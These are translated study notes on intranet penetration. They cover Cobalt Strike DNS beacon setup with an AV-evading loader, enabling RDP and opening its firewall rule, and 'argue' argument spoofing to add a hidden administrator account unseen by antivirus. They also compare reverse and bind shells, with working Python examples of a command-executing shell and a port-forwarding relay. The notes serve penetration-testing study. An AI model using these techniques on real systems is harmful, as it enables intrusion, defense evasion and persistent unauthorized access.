Study notes for intranet penetration

1. Find the website path under Windows

Visit the site and note the name of a file it serves (a script or image referenced in the page source, e.g. checkform.js), then search the whole drive for it with dir /s /b; the directory of the hit is the website path:

dir /s /b c:\checkform.js

 /S Displays files in the specified directory and all subdirectories.

 /B Uses bare format (no heading information or summary). For files only the full path is printed, which is what makes it practical here.
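The same search, generalized, as an added example that is not part of the original notes: besides listing every copy of the file (what dir /s /b does), it uses the file's URL path to tell the real web root from stray copies. It is plain Python over a temporary directory tree constructed for the demo; the file name checkform.js and the URL path /js/checkform.js are assumptions for illustration.

```python
r"""Infer a web root on disk from one file the site serves.

Added example, not from the original notes. Suppose the page source
references /js/checkform.js. `dir /s /b c:\checkform.js` lists every copy
of that file; this script does the same walk and then strips the URL path
off the end of each hit, which gives the document root directly (and drops
copies that do not sit under a matching js\ directory). The sample tree
below is constructed in a temporary directory.
"""
import os
import tempfile
from pathlib import Path, PurePosixPath


def find_files(root, name):
    r"""Same result as `dir /s /b <root>\<name>`: every file under root with that
    name, compared case-insensitively like NTFS does."""
    wanted = name.lower()
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower() == wanted:
                hits.append(Path(dirpath) / fn)
    return hits


def infer_web_roots(search_root, url_path):
    """Candidate document roots for url_path (e.g. '/js/checkform.js').

    A hit counts only if the tail of its filesystem path matches every
    component of the URL path, so C:/www/site/js/checkform.js gives
    C:/www/site while a stray C:/backup/checkform.js is rejected.
    """
    parts = PurePosixPath(url_path.lstrip("/")).parts
    wanted = tuple(p.lower() for p in parts)
    roots = []
    for hit in find_files(search_root, parts[-1]):
        tail = tuple(p.lower() for p in hit.parts[-len(parts):])
        if tail == wanted:
            roots.append(Path(*hit.parts[:-len(parts)]))
    return roots


def build_sample_tree():
    """Constructed layout: one real site plus a decoy copy of the file elsewhere."""
    base = Path(tempfile.mkdtemp(prefix="webroot_demo_"))
    (base / "www" / "site" / "js").mkdir(parents=True)
    (base / "www" / "site" / "js" / "checkform.js").write_text("// served by the site\n")
    (base / "backup").mkdir()
    (base / "backup" / "checkform.js").write_text("// stray copy, not under js/\n")
    return base


if __name__ == "__main__":
    base = build_sample_tree()
    print("all copies :", [str(p) for p in find_files(base, "checkform.js")])
    print("web roots  :", [str(p) for p in infer_web_roots(base, "/js/checkform.js")])
```

On a real host call infer_web_roots("C:\\", "/js/checkform.js") (or whatever path the page referenced) instead of the sample tree; the decoy in the sample shows why matching the whole URL tail matters when the same file name exists in backups or other sites.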

2. Determine whether the site and its database run on separate hosts (站库分离)

 3. Set up a DNS Beacon

  1. Prepare a VPS (the Cobalt Strike team server itself can be used) whose port 53 is reachable from the Internet (DNS Beacon talks UDP 53), and a domain name.

  2. Configure the domain's DNS records: an A record and an NS record. The A record points at the VPS's IP; the NS record delegates a subdomain to the hostname of that A record, so every query for a name under the subdomain is sent to the VPS, where the team server answers it.

  3. In CS, create a DNS Beacon listener: DNS Hosts is the delegated subdomain (the NS record), DNS Host (Stager) is the A record hostname.

  4. Generate the DNS payload as Windows Executable (S) (stageless). If AV flags the generated executable, generate raw shellcode instead and compile it into your own loader that is not detected.

  5. Run the payload on the target.

After uploading an AV-evading DNS payload and running it, the beacon checked in. A freshly checked-in DNS beacon shows up as an empty (black) entry and does not execute commands until you pick a data channel and force a check-in.

Run these two commands in the beacon console so that it reports in and executes tasks normally (mode selects the data channel; dns-txt carries far more data per request than the default A-record channel):

mode dns-txt
checkin

4. Open port 3389 (RDP)

Enable RDP

Works on every version:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Windows Server 2003 / 2008, via the registry flag fDenyTSConnections (0 allows connections, any non-zero value denies them):
Enable:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Disable:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
The same command is sometimes written with the key as HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server, which is just another way of quoting the space for cmd.exe; the original note's disable value 11111111 also works because it is non-zero.

Windows Server 2012 (also works on 2008, 2003, Win7 and XP), via WMI. Run all three:
1. wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
2. wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
3. reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
Command 1 allows connections; command 2 requires Network Level Authentication (connect with an NLA-capable client, or pass 0 to turn it off); command 3 allows more than one session per account, so connecting as a user who is already logged in does not kick that session off. None of these open the host firewall; on 2008/Win7 and later, if the firewall blocks 3389, also run:
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

View the RDP port

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
REG QUERY prints REG_DWORD values in hex: 0xd3d converts to 3389, the default port.

If an administrator moved RDP off the default port, this sets it back to 3389 (0xd3d); the change takes effect only after the Remote Desktop Services (TermService) service is restarted:
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

Remote desktop is enabled but you cannot find the port? The quick and brutal way is to see whether the server has the admin's phone number or QQ and ask him directly why a perfectly good 3389 had to be changed ... no, stop, that is a good way to get beaten up. Three proper ways:
1. In cmd: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2. In cmd: tasklist /svc to find the PID hosting TermService, then netstat -ano to read the port that PID is LISTENING on
3. In the registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp, value PortNumber

Reference: https://www.jianshu.com/p/8e7d2f78f5e1
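Method 2 above (tasklist /svc plus netstat -ano) and the hex PortNumber from REG QUERY are easy to misread in a hurry. The following is an added Python example, not from the original notes, that parses the three outputs and cross-checks them. The sample outputs, the PID 1124 and the moved port 7071 are constructed for the demo.

```python
r"""Recover the RDP listening port from the three sources the notes list.

Added example, not from the original post. It parses:
  * REG QUERY ... /v PortNumber  -> the hex REG_DWORD (0xd3d == 3389)
  * tasklist /svc                -> the PID of the svchost hosting TermService
  * netstat -ano                 -> the TCP port that PID is LISTENING on
and cross-checks them. The outputs below are constructed to look like a
server whose administrator moved RDP to 7071; paste in real output
captured on the host to use it for real.
"""
import re

REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    PortNumber    REG_DWORD    0x1b9f
"""

TASKLIST_SVC_OUTPUT = """
Image Name                     PID Services
========================= ======== ============================================
svchost.exe                    804 RpcEptMapper, RpcSs
svchost.exe                   1124 TermService
svchost.exe                   1368 Dnscache, NlaSvc
"""

NETSTAT_ANO_OUTPUT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       804
  TCP    0.0.0.0:7071           0.0.0.0:0              LISTENING       1124
  TCP    10.0.0.5:7071          10.0.0.9:51822         ESTABLISHED     1124
  TCP    [::]:7071              [::]:0                 LISTENING       1124
  UDP    0.0.0.0:5355           *:*                                    1368
"""


def rdp_port_from_reg_query(text):
    """REG QUERY prints REG_DWORD values in hex; convert PortNumber to decimal."""
    m = re.search(r"PortNumber\s+REG_DWORD\s+(0x[0-9a-fA-F]+)", text)
    if not m:
        raise ValueError("PortNumber not found in REG QUERY output")
    return int(m.group(1), 16)


def pid_of_service(tasklist_text, service):
    """PID whose 'Services' column in `tasklist /svc` contains the service name."""
    for line in tasklist_text.splitlines():
        m = re.match(r"^(\S+)\s+(\d+)\s+(.+)$", line.strip())
        if not m:
            continue
        if service in [s.strip() for s in m.group(3).split(",")]:
            return int(m.group(2))
    return None


def listening_ports_for_pid(netstat_text, pid):
    """TCP ports (IPv4 and IPv6) in LISTENING state for pid in `netstat -ano`."""
    ports = set()
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP" and f[3] == "LISTENING" and f[4] == str(pid):
            ports.add(int(f[1].rsplit(":", 1)[1]))   # handles 0.0.0.0:7071 and [::]:7071
    return sorted(ports)


def locate_rdp_port(reg_text, tasklist_text, netstat_text):
    """Registry value vs. the port TermService really listens on; they should agree."""
    reg_port = rdp_port_from_reg_query(reg_text)
    pid = pid_of_service(tasklist_text, "TermService")
    live = listening_ports_for_pid(netstat_text, pid) if pid is not None else []
    return {"registry": reg_port, "termservice_pid": pid,
            "listening": live, "consistent": reg_port in live}


if __name__ == "__main__":
    print(locate_rdp_port(REG_QUERY_OUTPUT, TASKLIST_SVC_OUTPUT, NETSTAT_ANO_OUTPUT))
```

When "consistent" comes back False the registry was changed but TermService has not been restarted yet (or the port in Wds\rdpwd\Tds\tcp differs); the live port from netstat is the one to connect to.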

5. Use the argue command to add a user without the AV noticing

argue: argument spoofing

Requires administrator or SYSTEM privileges (adding a local administrator needs them).

Usage:

argue [command] [fake arguments]

argue records a fake command line for a program. When Beacon later starts that program with execute or run, the process is created with the fake arguments and the real ones are patched into its memory only after creation, so a product that inspects the command line at process creation sees only the fake string. The fake arguments must not be shorter than the real ones, which is why the examples below pad them with a long run of x's. Running argue with no arguments lists the current spoofed programs.

Spoof net1 (net1, not net: net merely passes the real arguments on to net1, which would then show them):
argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Check the spoofed arguments:
argue
Add the user through the spoofed net1:
execute net1 user hack Root111! /add
execute net1 localgroup administrators hack /add

Spoofing the powershell.exe command line with argue

Running powershell.exe directly gets blocked, so spoof it:

argue powershell.exe xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Run argue again to check the result.

execute powershell.exe ... now runs without being intercepted. shell commands still fail, because shell really runs cmd.exe /c <arguments>: the process that gets spawned is cmd.exe, which this spoof does not cover.

reference:

http://www.0x3.biz/archives/837.html

https://mp.weixin.qq.com/s/dVOBHSWGDUcxnC8g0NWEAg

6. The difference between reverse_tcp and bind_tcp:

[reverse_tcp]
attacker -> [contact me at the port 4444] -> victim

after the payload is executed
attacker <-> [port 4444] <-> victim

[bind_tcp]
attacker -> [open the way for me in the port 4444] -> victim

after execution
attacker <-> [port 4444] <-> victim

reverse_tcp: the attacker chooses a port (LPORT) and IP (LHOST) and listens on them. When the payload runs on the target it connects out to LHOST:LPORT; the listener on the attacker's side then sees the target connect in.

bind_tcp: the attacker chooses a port (LPORT); when the payload runs on the target it opens that port and waits, and the attacker connects to it.

The reverse method is generally safer: the target initiates an outbound connection, which most firewalls allow, so it usually goes unnoticed, whereas bind opens a new listening port on the target, which host firewalls and security software pick up easily (and an inbound firewall rule blocks outright).

If the target can reach the Internet, use reverse_tcp and let it connect to our server to establish the session.

bind_tcp is for a target inside an intranet that cannot get out: open a port on that host and connect to it through a route forwarded into the network, for example a port forward or pivot on a host you already control.

Reference: https://blog.csdn.net/adidala/article/details/24117711
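To make the difference concrete, the following added Python example (not from the original notes or the referenced article) implements both models on 127.0.0.1 with the standard socket module: one target-side handler, two ways of wiring it up. Ports are chosen by the OS and the only command executed is echo.

```python
"""reverse_tcp vs bind_tcp, side by side on 127.0.0.1.

Added example, not from the original notes. One tiny command handler
plays the target in both cases; what changes is which side calls
listen()/accept() and which side calls connect():

  reverse_tcp: attacker listens on LPORT, target connects out to LHOST:LPORT
  bind_tcp:    target listens on LPORT, attacker connects in to it

The handler runs the line it receives through the local shell and returns
the output, as a real payload would; the only command sent here is echo.
"""
import socket
import subprocess
import threading


def handle_session(conn):
    """Target side, shared by both modes: read one command, run it, send output, close."""
    with conn:
        cmd = conn.recv(4096).decode().strip()
        out = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
        conn.sendall(out.encode())


def reverse_tcp_payload(lhost, lport):
    """reverse_tcp payload: an outbound connect() to the attacker's listener."""
    handle_session(socket.create_connection((lhost, lport)))


def bind_tcp_payload(bind_host, lport, ready, info):
    """bind_tcp payload: open a listening port on the target and wait for the attacker."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_host, lport))
    srv.listen(1)
    info["port"] = srv.getsockname()[1]   # published so the demo knows which port opened
    ready.set()
    conn, _ = srv.accept()
    srv.close()
    handle_session(conn)


def run_command(conn, cmd):
    """Attacker side: send one command, read until the target closes the session."""
    with conn:
        conn.sendall((cmd + "\n").encode())
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode().strip()


def reverse_tcp_demo(cmd="echo reverse"):
    """Attacker listens first (LPORT picked by the OS), then the payload dials out."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    lport = listener.getsockname()[1]
    t = threading.Thread(target=reverse_tcp_payload, args=("127.0.0.1", lport))
    t.start()
    conn, _ = listener.accept()   # the target connects to us
    listener.close()
    out = run_command(conn, cmd)
    t.join()
    return out


def bind_tcp_demo(cmd="echo bind"):
    """Payload listens first, then the attacker connects in."""
    ready, info = threading.Event(), {}
    t = threading.Thread(target=bind_tcp_payload, args=("127.0.0.1", 0, ready, info))
    t.start()
    ready.wait()
    conn = socket.create_connection(("127.0.0.1", info["port"]))   # we connect to the target
    out = run_command(conn, cmd)
    t.join()
    return out


if __name__ == "__main__":
    print("reverse_tcp ->", reverse_tcp_demo())
    print("bind_tcp    ->", bind_tcp_demo())
```

The listening socket in bind_tcp_payload is exactly what a host firewall or EDR flags: a new process that starts accepting inbound connections. In reverse_tcp_payload the target only ever calls connect(), which looks like any other outbound client.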

7. netsh port forwarding

1. Add a port forward (run from an administrator command prompt):
netsh interface portproxy add v4tov4 listenport=<listening port> connectaddress=<address to forward to> connectport=<port to forward to>
Example:
netsh interface portproxy add v4tov4 listenport=9988 connectaddress=192.168.88.110 connectport=9988
If listenaddress is omitted the rule listens on all IPv4 addresses. The relay is performed by the IP Helper service (iphlpsvc), which must be running, and the local firewall must allow inbound traffic to listenport.

2. Show the configured forwards:
netsh interface portproxy show all

3. Delete the forwarding rule. The listenaddress/listenport pair must match the rule exactly as show all lists it, so a rule added without listenaddress is deleted without one:
netsh interface portproxy delete v4tov4 listenport=9988
With an explicit listen address:
netsh interface portproxy delete v4tov4 listenaddress=192.168.88.110 listenport=9988

Reference: https://blog.csdn.net/hx7013/article/details/79786407
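What the portproxy rule does internally, as an added Python example that is not from the original notes: a user-space relay that listens on listenport and copies bytes to connectaddress:connectport in both directions. The forwarded-to host is a constructed echo server on 127.0.0.1; 192.168.88.110:9988 is the notes' example and does not need to exist to run the demo.

```python
"""A minimal v4tov4 port proxy: the relay netsh interface portproxy configures.

Added example, not from the original notes. PortProxy accepts on listenport
and, per client, dials connectaddress:connectport and pumps bytes both ways,
which is what `add v4tov4 listenport=9988 connectaddress=192.168.88.110
connectport=9988` makes the IP Helper service do. The forwarded-to host is a
constructed echo server on 127.0.0.1 so the demo runs offline.
"""
import socket
import threading


def pump(src, dst):
    """Copy bytes one way until src closes, then half-close dst so the peer sees EOF."""
    try:
        for data in iter(lambda: src.recv(4096), b""):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay(client, connectaddress, connectport):
    """Per-connection worker: dial the real target and bridge the two sockets."""
    try:
        target = socket.create_connection((connectaddress, connectport))
    except OSError:
        client.close()          # target unreachable: the client just sees the close
        return
    threading.Thread(target=pump, args=(client, target), daemon=True).start()
    pump(target, client)
    client.close()
    target.close()


class PortProxy:
    """One `netsh interface portproxy add v4tov4` rule; close() is the delete."""

    def __init__(self, listenport, connectaddress, connectport, listenaddress="0.0.0.0"):
        self.sock = socket.socket()
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((listenaddress, listenport))
        self.sock.listen(16)
        self.listenport = self.sock.getsockname()[1]
        self.target = (connectaddress, connectport)
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.sock.accept()
            except OSError:
                return              # listener closed
            threading.Thread(target=relay, args=(client, *self.target), daemon=True).start()

    def close(self):
        self.sock.close()


def start_echo_server():
    """Constructed stand-in for the forwarded-to host (192.168.88.110:9988 in the notes)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            for data in iter(lambda: conn.recv(4096), b""):
                conn.sendall(b"echo:" + data)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def send_through_proxy(listenport, payload):
    """Client: talk to the proxy's listen port; the reply proves traffic reached the target."""
    with socket.create_connection(("127.0.0.1", listenport)) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        return b"".join(iter(lambda: c.recv(4096), b""))


def demo():
    """Stand up echo target and proxy, push one message through, tear both down."""
    echo_srv, echo_port = start_echo_server()
    proxy = PortProxy(0, "127.0.0.1", echo_port, listenaddress="127.0.0.1")
    try:
        return send_through_proxy(proxy.listenport, b"hello via portproxy")
    finally:
        proxy.close()
        echo_srv.close()


if __name__ == "__main__":
    print(demo())
```

Because the proxy opens a fresh connection to the target, the target only ever sees the proxy host's address, which is the same blind spot a netsh rule leaves in the target's logs; on the pivot host, show all (or this process's listening socket) is where the rule is visible.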

8. Running a program in the background on Linux

nohup and & both put a program in the background, but they do different things: & detaches the command from the foreground of the shell, while nohup makes it ignore SIGHUP so it keeps running after the terminal or SSH session closes. They are normally combined, nohup in front and & at the end, with output redirected to a file.

Origin blog.csdn.net/qq_32393893/article/details/108321899